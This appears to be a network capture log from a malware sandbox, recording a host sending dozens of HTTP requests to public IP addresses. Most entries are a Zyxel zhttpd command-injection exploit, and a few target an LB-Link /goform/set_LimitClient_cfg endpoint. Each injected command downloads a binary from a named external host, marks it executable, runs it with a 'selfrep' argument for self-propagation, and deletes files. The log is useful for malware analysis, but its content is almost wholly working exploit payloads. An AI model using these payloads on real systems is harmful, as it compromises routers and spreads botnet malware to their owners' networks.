                                      Jan 19, 2024 17:29:51.148245096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9143192.168.2.1452706147.239.3.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.148269892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9144192.168.2.1433168169.169.40.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.148296118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9145192.168.2.145398081.58.77.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.148325920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9146192.168.2.1448218122.34.19.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.148366928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9147192.168.2.144917019.159.0.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.148403883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9148192.168.2.14588184.245.23.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.148420095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9149192.168.2.144127661.87.238.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.151050091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9150192.168.2.1440662220.84.188.2188080
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.576436043 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9151192.168.2.1451940119.209.192.538080
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.155455112 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                      Jan 19, 2024 17:29:52.442641973 CET103INHTTP/1.1 404 Not Found
                                      Content-Type: text/plain
                                      Content-Length: 30
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9152192.168.2.1449072160.96.62.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.159485102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9153192.168.2.1438048185.138.20.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.159526110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9154192.168.2.143398677.9.71.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.159557104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9155192.168.2.143888867.108.68.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.159615040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9156192.168.2.145938237.138.135.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.159642935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9157192.168.2.1440850170.201.125.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.159693003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9158192.168.2.1447934192.212.24.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.159708977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9159192.168.2.145283825.68.49.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.159774065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9160192.168.2.1451944149.201.46.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.159823895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9161192.168.2.145063040.137.175.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.159862041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9162192.168.2.1445494133.200.224.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.159884930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9163192.168.2.1456796190.105.8.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.159933090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9164192.168.2.1451922119.209.51.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.160044909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9165192.168.2.145393097.168.165.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.160090923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9166192.168.2.1437132115.136.147.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.160106897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9167192.168.2.1452738217.63.155.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.160135031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9168192.168.2.1442900116.132.243.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.160192966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9169192.168.2.1439136109.25.143.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.160233021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9170192.168.2.1459260168.46.101.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.160278082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9171192.168.2.144443613.189.156.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.160310030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9172192.168.2.1455438200.210.6.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.160345078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9173192.168.2.1458388211.110.37.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.160401106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9174192.168.2.1448586146.153.190.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.160449028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9175192.168.2.1445992134.61.87.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.160475969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9176192.168.2.1454906129.3.158.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.160516977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9177192.168.2.143968020.71.169.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.160547972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9178192.168.2.1460172200.184.77.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.160586119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9179192.168.2.145274293.176.65.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.160624981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9180192.168.2.145664223.10.148.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.160684109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9181192.168.2.1450658147.177.188.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.160696983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9182192.168.2.1441254120.195.156.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.160716057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9183192.168.2.1449618167.247.208.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.160757065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9184192.168.2.1435406180.169.84.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.160783052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9185192.168.2.1434624129.91.146.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.160825968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9186192.168.2.1440908121.230.40.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.160873890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9187192.168.2.1439788154.189.94.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.160911083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9188192.168.2.1458728116.64.45.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.160933971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9189192.168.2.144900882.189.44.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.160999060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9190192.168.2.1434534142.2.169.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.161040068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9191192.168.2.1441746193.47.226.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.161065102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9192192.168.2.1450558128.19.99.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.161120892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9193192.168.2.1451740176.133.229.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.161161900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9194192.168.2.1451414178.81.1.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.161201954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9195192.168.2.1436202138.30.4.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.161230087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9196192.168.2.144984692.105.242.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.161267042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9197192.168.2.1443688222.230.164.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.161298990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9198192.168.2.143435614.95.36.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.161358118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9199192.168.2.1454726219.70.143.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.161398888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9200192.168.2.1439310137.229.160.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.161449909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9201192.168.2.1435182120.213.186.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.161489010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9202192.168.2.1447452212.214.122.16443
                                      TimestampBytes transferredDirectionData
